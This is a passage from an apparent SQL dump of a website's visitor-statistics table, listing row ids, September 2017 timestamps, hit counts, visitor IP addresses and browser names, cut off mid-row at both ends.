178.71','chrome'),(153679,1504815546,1,1,0,0,'95.134.117.249','chrome'),(153680,1504815793,1,1,0,0,'46.101.107.186','chrome'),(153681,1504815796,1,1,0,0,'176.36.50.232','other'),(153682,1504816019,1,1,0,0,'91.196.178.65','chrome'),(153683,1504816135,1,1,0,0,'37.73.225.204','chrome'),(153684,1504816143,3,3,0,0,'5.45.207.64','other'),(153685,1504816459,1,1,0,0,'91.196.178.130','chrome'),(153686,1504816600,1,1,0,0,'91.196.178.135','chrome'),(153687,1504816766,1,1,0,0,'159.203.20.10','chrome'),(153688,1504816893,1,1,0,0,'178.92.8.224','chrome'),(153689,1504816958,1,1,0,0,'91.196.178.131','other'),(153690,1504817051,1,1,0,0,'8.29.198.25','other'),(153691,1504817059,2,2,0,0,'167.114.219.41','other'),(153692,1504817106,1,1,0,0,'8.37.230.93','other'),(153693,1504817347,1,1,0,0,'91.196.178.167','chrome'),(153694,1504817618,1,1,0,0,'91.196.178.101','chrome'),(153695,1504817791,1,1,0,0,'91.196.178.165','chrome'),(153696,1504818198,1,1,0,0,'51.255.65.46','other'),(153697,1504818316,1,1,0,0,'31.43.35.178','chrome'),(153698,1504818506,1,1,0,0,'91.196.178.72','chrome'),(153699,1504818582,1,1,0,0,'51.255.65.48','other'),(153700,1504818802,1,1,0,0,'5.45.207.64','other'),(153701,1504819416,1,1,0,0,'89.203.220.98','chrome'),(153702,1504819530,1,1,0,0,'91.196.178.39','other'),(153703,1504819773,1,1,0,0,'91.196.178.69','chrome'),(153704,1504819871,1,1,0,0,'91.196.178.130','chrome'),(153705,1504820210,1,1,0,0,'95.134.184.208','chrome'),(153706,1504820464,1,0,1,0,'66.249.76.108',''),(153707,1504820477,1,1,0,0,'37.52.20.210','chrome'),(153708,1504820883,1,1,0,0,'5.45.207.64','other'),(153709,1504821122,1,1,0,0,'141.8.183.1','other'),(153710,1504821494,1,1,0,0,'217.182.132.25','other'),(153711,1504821851,1,1,0,0,'51.255.65.77','other'),(153712,1504822457,1,1,0,0,'5.45.207.64','other'),(153713,1504822834,2,2,0,0,'141.8.183.1','other'),(153714,1504822902,1,1,0,0,'130.180.217.21','chrome'),(153715,1504822931,1,1,0,0,'180.76.15.19','other'),(153716,1504823774,1,1,0,0,'180.76.15.18','other'),(153717,1504823870,1,1,0,0,'5.45.207.64','other'),(153718,1504824011,1,1,0,0,'188.146.33.0','chrome'),(153719,1504824074,1,1,0,0,'62.182.126.54','chrome'),(153720,1504824479,1,1,0,0,'91.196.178.131','chrome'),(153721,1504824779,1,1,0,0,'51.255.65.44','other'),(153722,1504824809,3,3,0,0,'141.8.183.1','other'),(153723,1504825289,1,1,0,0,'217.182.132.181','other'),(153724,1504825329,1,1,0,0,'217.182.132.29','other'),(153725,1504825867,1,1,0,0,'157.55.39.92','other'),(153726,1504826183,1,1,0,0,'37.73.207.164','other'),(153727,1504826593,1,0,1,0,'66.249.66.155',''),(153728,1504826682,1,1,0,0,'94.74.74.231','chrome'),(153729,1504826836,1,1,0,0,'217.182.132.28','other'),(153730,1504827471,1,1,0,0,'51.255.65.49','other'),(153731,1504827750,1,1,0,0,'163.172.255.19','chrome'),(153732,1504827889,1,1,0,0,'8.29.198.25','other'),(153733,1504827902,1,1,0,0,'51.255.65.87','other'),(153734,1504827939,1,1,0,0,'51.255.65.62','other'),(153735,1504828340,3,3,0,0,'167.114.219.41','other'),(153736,1504828566,2,2,0,0,'5.45.207.64','other'),(153737,1504829293,1,1,0,0,'137.74.207.164','other'),(153738,1504829385,2,2,0,0,'141.8.183.1','other'),(153739,1504830267,1,1,0,0,'185.105.116.95','chrome'),(153740,1504830629,1,1,0,0,'51.255.65.46','other'),(153741,1504830741,2,0,2,0,'66.249.66.76',''),(153742,1504830854,1,1,0,0,'141.8.183.1','other'),(153743,1504830999,1,0,1,0,'66.249.66.75',''),(153744,1504831119,1,1,0,0,'217.182.132.170','other'),(153745,1504831150,1,1,0,0,'66.249.66.156','chrome'),(153746,1504831383,1,1,0,0,'5.45.207.64','other'),(153747,1504831557,1,1,0,0,'51.255.65.48','other'),(153748,1504831558,1,1,0,0,'91.196.178.131','chrome'),(153749,1504832314,1,1,0,0,'163.172.255.19','chrome'),(153750,1504832372,1,1,0,0,'82.145.223.69','other'),(153751,1504832459,1,1,0,0,'91.209.11.236','other'),(153752,1504832462,1,1,0,0,'217.182.132.70','other'),(153753,1504832648,1,1,0,0,'51.255.65.81','other'),(153754,1504832849,1,0,1,0,'66.249.76.108',''),(153755,1504832876,1,1,0,0,'46.211.154.79','other'),(153756,1504832995,1,0,1,0,'66.249.66.75',''),(153757,1504834491,1,1,0,0,'217.182.132.173','other'),(153758,1504834586,1,1,0,0,'91.200.124.60','other'),(153759,1504834592,1,1,0,0,'91.209.11.236','other'),(153760,1504834603,1,1,0,0,'151.80.27.116','other'),(153761,1504835026,1,1,0,0,'178.154.200.7','other'),(153762,1504835083,1,1,0,0,'51.255.65.89','other'),(153763,1504835208,1,0,1,0,'66.249.76.107',''),(153764,1504835224,1,1,0,0,'141.8.142.21','other'),(153765,1504835313,1,1,0,0,'51.255.71.110','other'),(153766,1504835803,1,1,0,0,'212.8.52.86','chrome'),(153767,1504836194,1,1,0,0,'141.8.183.1','other'),(153768,1504836199,1,1,0,0,'51.255.65.70','other'),(153769,1504836570,1,1,0,0,'5.45.207.64','other'),(153770,1504837463,1,1,0,0,'91.196.178.70','other'),(153771,1504837728,1,1,0,0,'217.182.132.29','other'),(153772,1504837850,1,1,0,0,'95.135.240.217','other'),(153773,1504838217,1,1,0,0,'51.255.65.26','other'),(153774,1504838392,5,5,0,0,'192.99.203.35','other'),(153775,1504838396,2,2,0,0,'5.45.207.64','other'),(153776,1504838734,1,1,0,0,'8.29.198.25','other'),(153777,1504838797,1,1,0,0,'94.178.201.133','chrome'),(153778,1504839194,3,3,0,0,'141.8.183.1','other'),(153779,1504839347,1,1,0,0,'37.115.156.139','chrome'),(153780,1504839354,1,1,0,0,'66.102.9.22','chrome'),(153781,1504839769,1,1,0,0,'217.182.132.191','other'),(153782,1504839820,1,1,0,0,'141.8.142.21','other'),(153783,1504839846,1,1,0,0,'46.133.10.109','chrome'),(153784,1504840432,1,1,0,0,'164.132.162.155','other'),(153785,1504840759,1,1,0,0,'91.196.178.97','chrome'),(153786,1504840999,1,1,0,0,'51.255.65.34','other'),(153787,1504841026,1,1,0,0,'82.145.220.54','chrome'),(153788,1504841623,1,1,0,0,'51.255.65.85','other'),(153789,1504841746,1,1,0,0,'91.196.178.36','chrome'),(153790,1504841776,1,1,0,0,'95.108.181.63','other'),(153791,1504841977,1,1,0,0,'217.182.132.175','other'),(153792,1504842055,1,1,0,0,'51.255.65.42','other'),(153793,1504842099,1,1,0,0,'81.95.188.123','chrome'),(153794,1504842470,2,2,0,0,'91.209.11.236','other'),(153795,1504842824,1,1,0,0,'91.196.178.133','chrome'),(153796,1504843429,1,1,0,0,'91.209.11.236','other'),(153797,1504843575,1,1,0,0,'46.133.152.255','chrome'),(153798,1504843644,1,1,0,0,'217.182.132.21','other'),(153799,1504843679,2,2,0,0,'94.180.77.238','firefox'),(153800,1504843705,1,1,0,0,'5.45.207.64','other'),(153801,1504843795,1,1,0,0,'46.133.210.76','chrome'),(153802,1504844177,1,1,0,0,'66.249.66.156','chrome'),(153803,1504844390,2,2,0,0,'141.8.142.21','other'),(153804,1504844505,1,1,0,0,'91.196.178.132','firefox'),(153805,1504844747,1,1,0,0,'5.45.207.32','other'),(153806,1504844870,1,1,0,0,'5.45.207.57','other'),(153807,1504845060,1,1,0,0,'95.134.220.104','chrome'),(153808,1504845157,1,1,0,0,'176.59.54.120','chrome'),(153809,1504845198,2,2,0,0,'141.8.183.1','other'),(153810,1504845199,1,1,0,0,'178.92.136.142','chrome'),(153811,1504845289,1,1,0,0,'107.167.105.242','opera'),(153812,1504845304,1,1,0,0,'107.167.108.247','opera'),(153813,1504845386,2,2,0,0,'5.45.207.64','other'),(153814,1504845473,1,1,0,0,'31.43.2.206','chrome'),(153815,1504845568,1,1,0,0,'91.196.178.36','chrome'),(153816,1504845604,1,1,0,0,'51.255.71.114','other'),(153817,1504845648,1,1,0,0,'91.196.179.65','chrome'),(153818,1504845825,1,1,0,0,'40.77.167.101','other'),(153819,1504846018,1,1,0,0,'87.250.224.80','other'),(153820,1504846021,1,1,0,0,'141.8.142.56','other'),(153821,1504846062,1,1,0,0,'95.132.9.5','chrome'),(153822,1504846069,1,0,1,0,'66.249.66.155',''),(153823,1504846462,1,1,0,0,'46.211.129.250','other'),(153824,1504846627,1,1,0,0,'77.222.140.6','chrome'),(153825,1504846831,1,1,0,0,'46.211.120.77','other'),(153826,1504847001,1,1,0,0,'137.74.201.100','other'),(153827,1504847145,1,1,0,0,'107.167.108.247','opera'),(153828,1504847150,1,1,0,0,'5.45.207.64','other'),(153829,1504847300,1,1,0,0,'91.196.178.102','chrome'),(153830,1504847320,1,1,0,0,'91.124.183.201','chrome'),(153831,1504847516,1,1,0,0,'51.255.65.29','other'),(153832,1504847639,1,1,0,0,'91.196.178.65','firefox'),(153833,1504847731,1,1,0,0,'91.196.179.61','firefox'),(153834,1504847733,1,1,0,0,'137.74.207.164','other'),(153835,1504847794,1,1,0,0,'217.182.132.51','other'),(153836,1504847802,1,1,0,0,'46.201.174.102','chrome'),(153837,1504847808,1,1,0,0,'91.196.177.8','chrome'),(153838,1504848095,1,1,0,0,'46.211.115.165','chrome'),(153839,1504848294,1,1,0,0,'91.196.178.129','chrome'),(153840,1504848395,1,1,0,0,'194.1.195.225','other'),(153841,1504848435,1,1,0,0,'91.196.178.167','chrome'),(153842,1504848509,1,1,0,0,'91.196.177.46','firefox'),(153843,1504848696,1,1,0,0,'82.145.221.127','chrome'),(153844,1504848862,1,1,0,0,'91.196.178.104','chrome'),(153845,1504848880,1,1,0,0,'46.164.136.226','chrome'),(153846,1504848898,1,1,0,0,'46.201.175.105','chrome'),(153847,1504848988,2,2,0,0,'91.196.178.65','chrome'),(153848,1504849038,1,1,0,0,'91.196.179.65','firefox'),(153849,1504849045,1,1,0,0,'217.182.132.24','other'),(153850,1504849120,1,1,0,0,'5.254.65.103','chrome'),(153851,1504849187,1,1,0,0,'217.182.132.60','other'),(153852,1504849279,2,2,0,0,'141.8.183.1','other'),(153853,1504849360,1,1,0,0,'91.196.177.20','chrome'),(153854,1504849411,1,1,0,0,'109.237.81.162','chrome'),(153855,1504849418,1,1,0,0,'37.55.150.29','chrome'),(153856,1504849568,1,1,0,0,'8.29.198.26','other'),(153857,1504849619,1,1,0,0,'95.132.30.13','chrome'),(153858,1504849766,1,1,0,0,'91.196.177.35','firefox'),(153859,1504849945,1,1,0,0,'91.196.178.102','chrome'),(153860,1504850073,1,1,0,0,'137.74.207.101','other'),(153861,1504850094,2,2,0,0,'91.196.178.70','chrome'),(153862,1504850099,1,1,0,0,'51.255.71.125','other'),(153863,1504850106,1,1,0,0,'217.182.132.175','other'),(153864,1504850161,1,1,0,0,'180.76.15.158','other'),(153865,1504850297,1,1,0,0,'51.255.65.34','other'),(153866,1504850379,1,1,0,0,'91.196.178.165','chrome'),(153867,1504850386,1,1,0,0,'95.132.24.254','msie'),(153868,1504850410,6,6,0,0,'142.4.200.37','other'),(153869,1504850510,1,1,0,0,'46.211.67.220','chrome'),(153870,1504850525,2,2,0,0,'91.196.177.43','chrome'),(153871,1504850567,1,1,0,0,'91.196.178.134','chrome'),(153872,1504850574,1,1,0,0,'46.201.240.112','firefox'),(153873,1504850617,1,1,0,0,'5.45.207.64','other'),(153874,1504850622,1,1,0,0,'51.255.65.53','other'),(153875,1504850677,1,1,0,0,'31.43.21.198','firefox'),(153876,1504850713,1,1,0,0,'217.182.132.84','other'),(153877,1504850895,1,1,0,0,'95.132.42.155','chrome'),(153878,1504850900,1,1,0,0,'46.174.162.192','chrome'),(153879,1504850991,1,1,0,0,'37.52.17.44','other'),(153880,1504851066,1,1,0,0,'217.182.132.185','other'),(153881,1504851075,1,1,0,0,'217.182.132.146','other'),(153882,1504851172,1,1,0,0,'130.180.218.247','firefox'),(153883,1504851247,2,2,0,0,'141.8.142.21','other'),(153884,1504851281,1,1,0,0,'109.207.199.34','chrome'),(153885,1504851325,1,1,0,0,'91.196.178.161','chrome'),(153886,1504851469,1,1,0,0,'95.134.221.10','chrome'),(153887,1504851511,1,1,0,0,'91.196.178.134','firefox'),(153888,1504851529,1,1,0,0,'91.196.177.114','chrome'),(153889,1504851737,1,1,0,0,'95.132.24.254','chrome'),(153890,1504851757,1,1,0,0,'91.196.178.67','other'),(153891,1504851794,1,1,0,0,'217.182.132.182','other'),(153892,1504851862,1,0,1,0,'66.249.76.109',''),(153893,1504851934,1,1,0,0,'37.73.245.151','chrome'),(153894,1504852057,1,1,0,0,'141.8.183.1','other'),(153895,1504852371,1,1,0,0,'77.222.140.6','firefox'),(153896,1504852562,1,1,0,0,'5.45.207.32','other'),(153897,1504852588,1,1,0,0,'91.196.178.33','chrome'),(153898,1504852593,1,1,0,0,'141.8.142.21','other'),(153899,1504852621,1,1,0,0,'91.196.178.36','chrome'),(153900,1504852809,1,1,0,0,'80.254.155.43','chrome'),(153901,1504852840,1,1,0,0,'94.178.118.129','chrome'),(153902,1504852901,1,1,0,0,'130.180.218.139','chrome'),(153903,1504852936,1,1,0,0,'195.10.210.49','chrome'),(153904,1504853086,1,1,0,0,'5.255.253.4','other'),(153905,1504853090,1,1,0,0,'178.154.200.27','other'),(153906,1504853094,1,1,0,0,'37.53.227.91','chrome'),(153907,1504853122,1,1,0,0,'107.167.108.247','opera'),(153908,1504853134,1,1,0,0,'46.211.96.250','chrome'),(153909,1504853298,1,1,0,0,'91.196.178.70','chrome'),(153910,1504853299,1,1,0,0,'91.196.178.169','firefox'),(153911,1504853354,1,1,0,0,'95.132.29.247','firefox'),(153912,1504853488,1,1,0,0,'91.196.177.8','chrome'),(153913,1504853543,1,1,0,0,'91.196.177.35','firefox'),(153914,1504853731,1,1,0,0,'37.53.111.205','chrome'),(153915,1504853894,1,1,0,0,'176.36.32.9','chrome'),(153916,1504853914,9,9,0,0,'107.150.59.98','other'),(153917,1504854164,1,1,0,0,'77.222.134.102','other'),(153918,1504854385,1,1,0,0,'107.167.108.234','other'),(153919,1504854396,1,1,0,0,'91.196.177.96','chrome'),(153920,1504854533,1,1,0,0,'91.196.178.69','firefox'),(153921,1504854576,1,1,0,0,'91.196.177.46','chrome'),(153922,1504854665,1,1,0,0,'95.132.123.220','chrome'),(153923,1504854718,1,1,0,0,'91.196.178.68','chrome'),(153924,1504854823,1,1,0,0,'37.110.100.83','msie'),(153925,1504855016,1,1,0,0,'91.196.178.70','chrome'),(153926,1504855171,1,1,0,0,'82.207.91.234','other'),(153927,1504855201,1,1,0,0,'107.167.108.247','opera'),(153928,1504855257,1,1,0,0,'66.102.9.22','chrome'),(153929,1504855424,1,1,0,0,'51.255.65.17','other'),(153930,1504855569,1,1,0,0,'51.255.65.82','other'),(153931,1504855599,1,1,0,0,'217.182.132.193','other'),(153932,1504855643,1,1,0,0,'66.102.9.26','chrome'),(153933,1504855667,2,2,0,0,'91.196.177.46','chrome'),(153934,1504855680,1,1,0,0,'91.196.178.165','chrome'),(153935,1504855748,1,1,0,0,'91.196.178.99','chrome'),(153936,1504855798,1,1,0,0,'91.196.178.166','chrome'),(153937,1504855831,1,1,0,0,'141.8.183.1','other'),(153938,1504855865,1,1,0,0,'51.255.65.14','other'),(153939,1504856098,2,2,0,0,'91.209.11.236','other'),(153940,1504856246,1,1,0,0,'40.77.167.101','other'),(153941,1504856486,1,1,0,0,'91.196.178.39','other'),(153942,1504856896,1,1,0,0,'91.196.178.36','chrome'),(153943,1504856900,1,1,0,0,'80.254.155.43','chrome'),(153944,1504856941,1,1,0,0,'217.182.132.33','other'),(153945,1504857057,1,1,0,0,'91.196.177.8','chrome'),(153946,1504857197,1,1,0,0,'91.196.178.70','chrome'),(153947,1504857407,1,1,0,0,'95.132.6.30','chrome'),(153948,1504857565,1,1,0,0,'91.196.178.98','chrome'),(153949,1504857628,1,1,0,0,'217.182.132.241','other'),(153950,1504858133,1,1,0,0,'107.167.105.166','opera'),(153951,1504858172,2,2,0,0,'91.209.11.236','other'),(153952,1504858188,1,1,0,0,'95.132.123.220','firefox'),(153953,1504858243,1,1,0,0,'77.222.134.102','firefox'),(153954,1504858286,1,1,0,0,'92.112.104.222','chrome'),(153955,1504858290,1,1,0,0,'137.74.207.109','other'),(153956,1504858403,1,1,0,0,'37.73.134.127','chrome'),(153957,1504858494,1,1,0,0,'91.196.178.98','chrome'),(153958,1504858536,1,1,0,0,'91.196.179.134','chrome'),(153959,1504858599,1,1,0,0,'137.74.207.114','other'),(153960,1504858663,1,1,0,0,'217.182.132.20','other'),(153961,1504858714,1,1,0,0,'51.255.65.70','other'),(153962,1504858843,1,1,0,0,'77.222.140.6','firefox'),(153963,1504858938,1,1,0,0,'5.45.207.64','other'),(153964,1504858963,1,1,0,0,'137.74.207.102','other'),(153965,1504859264,1,1,0,0,'51.255.65.19','other'),(153966,1504859636,1,1,0,0,'89.185.0.165','firefox'),(153967,1504859702,1,1,0,0,'95.132.24.254','msie'),(153968,1504859774,1,1,0,0,'194.79.23.246','chrome'),(153969,1504859793,1,1,0,0,'141.8.183.1','other'),(153970,1504859884,2,2,0,0,'91.209.11.236','other'),(153971,1504859899,1,1,0,0,'91.196.179.134','chrome'),(153972,1504860387,1,1,0,0,'51.255.65.70','other'),(153973,1504860403,1,1,0,0,'8.29.198.27','other'),(153974,1504860707,1,1,0,0,'51.255.65.31','other'),(153975,1504860747,1,1,0,0,'5.45.207.64','other'),(153976,1504860759,1,1,0,0,'91.196.178.103','chrome'),(153977,1504860841,2,2,0,0,'141.8.183.1','other'),(153978,1504860881,1,1,0,0,'107.167.105.166','opera'),(153979,1504861006,1,1,0,0,'91.196.178.102','chrome'),(153980,1504861214,1,1,0,0,'91.196.179.134','chrome'),(153981,1504861260,1,1,0,0,'107.167.108.203','opera'),(153982,1504861295,1,1,0,0,'51.255.71.131','other'),(153983,1504861403,1,1,0,0,'51.255.65.41','other'),(153984,1504861408,1,1,0,0,'91.196.177.17','chrome'),(153985,1504861823,1,1,0,0,'66.249.66.156','chrome'),(153986,1504862240,1,1,0,0,'91.196.178.164','chrome'),(153987,1504862339,1,1,0,0,'51.255.71.116','other'),(153988,1504862413,1,1,0,0,'137.74.207.114','other'),(153989,1504862623,1,1,0,0,'141.8.183.1','other'),(153990,1504862645,1,1,0,0,'107.167.105.166','opera'),(153991,1504862670,1,1,0,0,'91.209.11.236','other'),(153992,1504862743,4,4,0,0,'5.45.207.64','other'),(153993,1504862763,1,0,1,0,'66.249.66.75',''),(153994,1504862861,1,1,0,0,'137.74.207.116','other'),(153995,1504862902,1,1,0,0,'85.115.62.180','other'),(153996,1504862913,1,1,0,0,'95.132.51.59','chrome'),(153997,1504862917,1,1,0,0,'51.255.65.48','other'),(153998,1504862953,1,0,1,0,'66.249.76.89',''),(153999,1504862964,1,1,0,0,'37.73.221.83','chrome'),(154000,1504863483,2,2,0,0,'157.55.39.42','other'),(154001,1504863509,1,1,0,0,'91.196.178.135','firefox'),(154002,1504863722,2,2,0,0,'141.8.183.1','other'),(154003,1504863897,1,1,0,0,'107.167.105.166','opera'),(154004,1504863998,1,1,0,0,'51.255.65.72','other'),(154005,1504864286,1,1,0,0,'51.255.65.80','other'),(154006,1504864322,3,3,0,0,'66.249.83.221','chrome'),(154007,1504864323,1,1,0,0,'85.115.58.180','chrome'),(154008,1504864326,1,1,0,0,'91.196.177.118','chrome'),(154009,1504864459,1,1,0,0,'5.228.9.217','chrome'),(154010,1504864519,1,1,0,0,'51.255.65.97','other'),(154011,1504864533,1,1,0,0,'141.8.142.21','other'),(154012,1504864632,1,1,0,0,'46.203.14.166','chrome'),(154013,1504864724,1,1,0,0,'46.201.113.89','chrome'),(154014,1504864742,2,2,0,0,'141.8.183.1','other'),(154015,1504865214,1,1,0,0,'91.196.178.164','chrome'),(154016,1504865223,1,1,0,0,'51.255.65.90','other'),(154017,1504865232,1,1,0,0,'95.132.51.232','firefox'),(154018,1504865283,1,1,0,0,'51.255.71.98','other'),(154019,1504865471,1,1,0,0,'130.180.219.37','firefox'),(154020,1504865669,1,1,0,0,'46.39.36.11','chrome'),(154021,1504865711,1,1,0,0,'91.196.178.161','chrome'),(154022,1504865866,2,2,0,0,'5.45.207.32','other'),(154023,1504865887,1,1,0,0,'5.45.207.64','other'),(154024,1504866031,1,1,0,0,'91.196.178.65','chrome'),(154025,1504866035,1,1,0,0,'91.196.178.98','chrome'),(154026,1504866041,3,3,0,0,'204.12.222.250','firefox'),(154027,1504866291,1,1,0,0,'107.167.108.72','chrome'),(154028,1504866315,1,1,0,0,'51.255.65.58','other'),(154029,1504866445,1,0,1,0,'66.249.66.75',''),(154030,1504866488,1,1,0,0,'51.255.65.21','other'),(154031,1504866492,1,1,0,0,'176.36.13.96','other'),(154032,1504866507,1,1,0,0,'217.182.132.173','other'),(154033,1504866602,1,1,0,0,'5.45.207.66','other'),(154034,1504866783,1,1,0,0,'54.165.59.7','other'),(154035,1504866966,1,1,0,0,'91.196.178.98','chrome'),(154036,1504867044,1,0,1,0,'66.249.76.91',''),(154037,1504867062,1,1,0,0,'91.196.178.68','chrome'),(154038,1504867340,1,1,0,0,'46.211.112.231','other'),(154039,1504867549,1,1,0,0,'157.55.39.92','other'),(154040,1504867735,1,1,0,0,'37.73.210.44','other'),(154041,1504867776,1,1,0,0,'91.209.11.236','other'),(154042,1504867912,1,1,0,0,'5.45.207.64','other'),(154043,1504867958,1,1,0,0,'137.74.207.119','other'),(154044,1504867987,1,1,0,0,'107.167.104.75','opera'),(154045,1504868403,1,1,0,0,'141.8.183.1','other'),(154046,1504868620,1,1,0,0,'51.255.65.83','other'),(154047,1504868637,1,1,0,0,'46.211.248.44','other'),(154048,1504868774,1,1,0,0,'91.209.11.236','other'),(154049,1504868784,1,1,0,0,'176.36.30.34','other'),(154050,1504868911,1,1,0,0,'107.167.104.205','other'),(154051,1504868966,19,19,0,0,'52.17.61.154','other'),(154052,1504869218,1,1,0,0,'91.196.178.70','chrome'),(154053,1504869403,1,1,0,0,'51.255.65.7','other'),(154054,1504869431,1,1,0,0,'91.196.178.165','chrome'),(154055,1504869678,1,1,0,0,'51.255.71.128','other'),(154056,1504869817,1,1,0,0,'107.167.104.75','opera'),(154057,1504869907,1,1,0,0,'91.196.178.103','chrome'),(154058,1504870113,1,1,0,0,'130.180.208.246','firefox'),(154059,1504870517,1,1,0,0,'95.134.117.126','chrome'),(154060,1504870623,1,1,0,0,'37.53.122.217','chrome'),(154061,1504870933,1,1,0,0,'95.135.213.214','firefox'),(154062,1504871041,1,1,0,0,'91.196.179.25','chrome'),(154063,1504871111,1,1,0,0,'91.196.178.71','chrome'),(154064,1504871198,1,1,0,0,'107.167.105.166','opera'),(154065,1504871235,1,1,0,0,'8.29.198.26','other'),(154066,1504871274,1,1,0,0,'185.137.18.184','chrome'),(154067,1504871329,1,1,0,0,'217.182.132.93','other'),(154068,1504871373,1,1,0,0,'109.86.147.218','chrome'),(154069,1504871405,1,1,0,0,'217.182.132.6','other'),(154070,1504871500,1,1,0,0,'51.255.65.51','other'),(154071,1504871515,1,1,0,0,'51.255.65.97','other'),(154072,1504871525,1,1,0,0,'91.209.11.236','other'),(154073,1504871551,1,1,0,0,'5.45.207.64','other'),(154074,1504871556,2,2,0,0,'141.8.183.1','other'),(154075,1504871628,2,2,0,0,'91.196.178.103','chrome'),(154076,1504871637,19,19,0,0,'52.50.23.6','other'),(154077,1504871683,1,1,0,0,'51.255.71.101','other'),(154078,1504871716,1,1,0,0,'91.196.178.39','chrome'),(154079,1504871799,1,1,0,0,'217.182.132.87','other'),(154080,1504872086,1,1,0,0,'217.182.132.153','other'),(154081,1504872251,1,1,0,0,'62.189.183.62','other'),(154082,1504872329,1,1,0,0,'180.76.15.22','other'),(154083,1504872483,1,1,0,0,'91.209.11.236','other'),(154084,1504872764,1,1,0,0,'91.196.179.25','chrome'),(154085,1504872945,1,1,0,0,'46.211.7.180','chrome'),(154086,1504872954,1,1,0,0,'95.108.181.60','other'),(154087,1504873196,1,1,0,0,'188.166.57.246','chrome'),(154088,1504873226,1,1,0,0,'91.196.178.65','chrome'),(154089,1504873347,1,1,0,0,'91.196.177.80','chrome'),(154090,1504873463,19,19,0,0,'54.72.112.171','other'),(154091,1504873471,1,1,0,0,'51.255.65.224','other'),(154092,1504873770,1,1,0,0,'46.201.240.112','chrome'),(154093,1504874252,1,1,0,0,'217.182.132.193','other'),(154094,1504874291,1,1,0,0,'54.208.102.37','other'),(154095,1504874397,1,1,0,0,'91.196.178.70','chrome'),(154096,1504874414,1,1,0,0,'90.137.145.14','chrome'),(154097,1504874490,1,1,0,0,'37.73.229.153','chrome'),(154098,1504874527,1,1,0,0,'94.178.118.129','chrome'),(154099,1504874818,1,1,0,0,'137.74.207.170','other'),(154100,1504874824,2,2,0,0,'141.8.183.1','other'),(154101,1504875025,1,1,0,0,'107.167.105.166','opera'),(154102,1504875358,1,1,0,0,'51.255.65.13','other'),(154103,1504875570,1,0,1,0,'66.249.76.109',''),(154104,1504875952,1,1,0,0,'157.185.131.67','other'),(154105,1504876033,1,1,0,0,'85.115.62.180','chrome'),(154106,1504876055,2,2,0,0,'141.8.142.21','other'),(154107,1504876160,1,1,0,0,'84.16.227.124','chrome'),(154108,1504876250,1,1,0,0,'185.137.18.156','chrome'),(154109,1504876314,1,1,0,0,'80.78.39.180','chrome'),(154110,1504876444,1,1,0,0,'188.166.80.221','chrome'),(154111,1504876449,1,1,0,0,'157.55.39.42','other'),(154112,1504876458,1,1,0,0,'185.137.18.77','chrome'),(154113,1504876620,1,1,0,0,'107.167.108.201','other'),(154114,1504876685,1,1,0,0,'151.80.27.116','other'),(154115,1504876838,1,1,0,0,'5.45.207.64','other'),(154116,1504877052,1,1,0,0,'107.167.109.27','opera'),(154117,1504877055,1,1,0,0,'40.77.167.101','other'),(154118,1504877075,1,1,0,0,'91.196.177.46','chrome'),(154119,1504877174,1,1,0,0,'51.255.65.96','other'),(154120,1504877268,1,1,0,0,'164.132.162.157','other'),(154121,1504877370,1,1,0,0,'217.182.132.50','other'),(154122,1504877384,1,1,0,0,'217.182.132.149','other'),(154123,1504877515,1,1,0,0,'46.211.3.250','chrome'),(154124,1504877663,1,1,0,0,'217.182.132.71','other'),(154125,1504878236,1,1,0,0,'77.222.134.100','firefox'),(154126,1504878349,1,1,0,0,'95.135.91.97','chrome'),(154127,1504878501,1,1,0,0,'157.55.39.37','other'),(154128,1504878644,1,1,0,0,'80.254.155.43','chrome'),(154129,1504878780,1,1,0,0,'91.196.178.104','chrome'),(154130,1504878824,1,1,0,0,'37.146.35.215','chrome'),(154131,1504878860,1,1,0,0,'91.196.178.69','chrome'),(154132,1504879116,1,1,0,0,'46.211.128.67','chrome'),(154133,1504879141,1,1,0,0,'91.196.178.130','chrome'),(154134,1504879220,1,1,0,0,'217.182.132.56','other'),(154135,1504879307,1,1,0,0,'51.255.65.18','other'),(154136,1504879386,1,1,0,0,'130.180.218.1','chrome'),(154137,1504879432,1,1,0,0,'217.182.132.55','other'),(154138,1504879681,1,1,0,0,'91.196.178.162','firefox'),(154139,1504879708,1,1,0,0,'51.255.65.42','other'),(154140,1504879818,1,1,0,0,'157.55.39.42','other'),(154141,1504880190,1,1,0,0,'91.196.178.166','chrome'),(154142,1504880359,1,1,0,0,'107.167.105.166','opera'),(154143,1504880381,1,1,0,0,'141.8.183.1','other'),(154144,1504880486,1,1,0,0,'217.182.132.95','other'),(154145,1504880747,1,1,0,0,'91.196.178.72','firefox'),(154146,1504880926,1,1,0,0,'95.135.91.97','chrome'),(154147,1504881299,1,1,0,0,'217.182.132.50','other'),(154148,1504881437,1,1,0,0,'178.62.93.49','chrome'),(154149,1504881713,1,1,0,0,'51.255.71.111','other'),(154150,1504881861,1,1,0,0,'217.69.133.5','other'),(154151,1504881980,1,1,0,0,'91.209.11.236','other'),(154152,1504882076,1,1,0,0,'8.29.198.26','other'),(154153,1504882099,1,1,0,0,'91.196.178.36','chrome'),(154154,1504882109,1,1,0,0,'141.8.183.1','other'),(154155,1504882139,1,1,0,0,'95.132.51.59','chrome'),(154156,1504882172,1,1,0,0,'217.182.132.147','other'),(154157,1504882427,1,1,0,0,'51.255.65.14','other'),(154158,1504882696,1,1,0,0,'18.220.87.201','other'),(154159,1504883201,1,1,0,0,'91.196.178.33','firefox'),(154160,1504883262,1,1,0,0,'91.196.177.118','chrome'),(154161,1504883280,1,1,0,0,'40.77.167.101','other'),(154162,1504883471,1,1,0,0,'91.209.11.236','other'),(154163,1504883531,1,1,0,0,'91.196.178.103','chrome'),(154164,1504883644,1,0,1,0,'66.249.76.89',''),(154165,1504883877,1,1,0,0,'107.167.105.166','opera'),(154166,1504883925,1,1,0,0,'217.182.132.19','other'),(154167,1504883929,1,1,0,0,'37.9.113.78','other'),(154168,1504884350,1,1,0,0,'51.255.65.61','other'),(154169,1504884435,1,1,0,0,'141.8.183.19','other'),(154170,1504884593,2,2,0,0,'91.209.11.236','other'),(154171,1504884679,1,1,0,0,'217.182.132.15','other'),(154172,1504884686,1,1,0,0,'217.69.133.5','other'),(154173,1504884750,1,1,0,0,'91.124.83.199','chrome'),(154174,1504884874,1,1,0,0,'46.219.78.133','chrome'),(154175,1504884943,1,1,0,0,'51.255.71.118','other'),(154176,1504884962,1,1,0,0,'94.178.114.188','chrome'),(154177,1504885007,1,1,0,0,'51.255.65.58','other'),(154178,1504885048,1,1,0,0,'217.182.132.37','other'),(154179,1504885157,1,1,0,0,'46.211.66.56','chrome'),(154180,1504885193,1,1,0,0,'217.182.132.180','o